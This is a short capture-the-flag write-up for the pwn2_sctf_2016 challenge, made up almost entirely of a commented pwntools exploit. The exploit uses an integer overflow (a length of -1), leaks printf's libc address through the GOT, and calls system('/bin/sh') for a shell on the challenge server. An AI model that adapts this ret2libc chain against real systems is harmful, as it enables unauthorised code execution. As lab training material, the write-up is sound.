
pwn | pwn2_sctf_2016

32位ret2libc + 整数溢出
题目给了syscall
但是找不到pop eax，没办法使用。

exp如下:

from pwn import *
from LibcSearcher.LibcSearcher import *
import struct

context.log_level = 'debug'

# Target binary and the addresses both payloads below reuse.
elf = ELF('./pwn2_sctf_2016')
p_main = 0x0804852F  # hard-coded address of main(); used as the return address after each libc call so the program loops back to its prompt
p_plt_printf = elf.plt['printf']
p_got_printf = elf.got['printf']


# p = process('./pwn2_sctf_2016')
p = remote('node4.buuoj.cn',27450)

p.recvuntil("read? ")

# Answer the length prompt with -1: the integer-overflow step described in the
# write-up above (presumably a negative count gets past the size check — confirm
# against the binary's read routine).
p.sendline(b'-1')

p.recvuntil("!\n")


# stack overflow

# Stage 1 frame (32-bit cdecl layout): 0x2c+4 bytes of padding reach the saved
# return address, which is pointed at printf@plt; p_main sits where printf's own
# return address goes, p_got_printf where its first argument goes. printf thus
# uses the GOT entry as its format string and writes out the raw bytes stored
# there, i.e. printf's resolved libc address.
payload = b'A'*(0x2c+4) + p32(p_plt_printf) + p32(p_main) + p32(p_got_printf)

p.sendline(payload)

# NOTE(review): recvuntil/sendline receive str here and below but bytes elsewhere
# in this script; recent pwntools versions warn on str arguments — confirm this
# mix is harmless for the version in use.
p.recvuntil('\n')

# recv leak addr
# The leak is the next 4 raw bytes, little-endian (equivalent to pwntools' u32()).
# NOTE(review): this assumes the address contains no byte that printf stops at
# (a NUL) before all 4 bytes are emitted — verify the leak looks sane in the log.
p_libc_printf = struct.unpack('<I', p.recv(4))[0]
# Identify the remote libc from the leaked printf address, then rebase the
# symbols the second stage needs.
libc = LibcSearcher('printf', p_libc_printf)
p_libc_base = p_libc_printf - libc.dump('printf')
p_libc_binsh = p_libc_base + libc.dump('str_bin_sh')
p_libc_system = p_libc_base + libc.dump('system')


# Second pass through main() (returned to by the first frame): same prompt
# sequence and the same -1 answer.
p.recvuntil('read? ')
p.sendline('-1')
p.recvuntil('!\n')

# Stage 2: same frame layout, now calling system with the "/bin/sh" string from
# libc as its argument and main() as the return address.
payload = b'A'*(0x2c+4) + p32(p_libc_system) + p32(p_main) + p32(p_libc_binsh)
p.sendline(payload)


p.interactive()
